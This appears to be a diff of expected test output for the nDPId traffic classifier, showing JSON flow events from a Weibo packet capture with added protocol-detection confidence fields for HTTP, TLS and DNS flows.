+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00590{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
